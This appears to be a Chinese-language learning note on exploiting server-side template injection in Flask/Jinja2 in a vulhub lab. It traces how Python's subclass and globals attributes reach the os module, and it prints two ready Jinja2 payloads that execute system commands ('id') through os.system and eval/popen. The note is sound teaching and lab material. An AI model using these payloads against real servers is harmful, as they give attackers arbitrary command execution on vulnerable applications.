Flask（Jinja2） 服务端模板注入漏洞

其实我根本没用过flask模板，但是最近在学习python，研究下划线，莫名其妙地就学习到这里了。

首先搭建一个flask环境。在github上下一个docker
https://github.com/vulhub/vulhub/tree/master/flask/ssti
然后运行docker

先来看一下代码：

由此，在浏览器中输入

 http://your-ip/?name=leaf

会出现 hello leaf
但在name后面也可以输入其他东西，比如：

 http://your-ip/?name={{1*1}}

出现 hello 1

 http://your-ip/?name={{'aaa'.upper()}}

出现AAA

由此就有大神找出了任意命令执行的方法了。
在python里要执行系统命令需要import os模块。

想要在模板中直接调用内置模块 os，即需要在模板环境中对其注册

需要在上面的代码里加一句：

t.globals['os'] = os

如果没有加这一句，直接使用os中的方法会报错。
那么，如何在未注册 os 模块的情况下在模板中调用 popen() 函数执行系统命令呢？这就用到之前研究的各种下划线函数了。

先看下面的代码：

由此可以访问到很多其他模块，os模块自然也可以这样访问到。

查阅的其他资料，访问os模块都是从warnings.catch_warnings模块入手的。看一下catch_warnings在哪个位置。

知道了位置后，再用func_global看看该模块有哪些global函数

这里能看到linecache，我们要访问的os模块就在这里，看看这个模块的各种属性：

就能看到os模块了（图片太大，不贴了）。
既然找到了os，接下来就是使用它了。

现在看看怎么在Jinja2中直接构造命令执行代码，我对Jinja2还不算很熟悉，这里先放上两段大神的代码：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{{c.__init__.func_globals['linecache'].__dict__['os'].system('id') }}{% endif %}{% endfor %}

当然也可以用eval函数，代码如下：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}  {% for b in c.__init__.__globals__.values() %}  {% if b.__class__ == {}.__class__ %}    {% if 'eval' in b.keys() %}      {{ b['eval']('__import__("os").popen("id").read()') }}    {% endif %}  {% endif %}  {% endfor %}{% endif %}{% endfor %}

最后放到浏览器里注意要url编码,就可以命令执行了

参考：https://github.com/vulhub/vulhub/tree/master/flask/ssti
http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates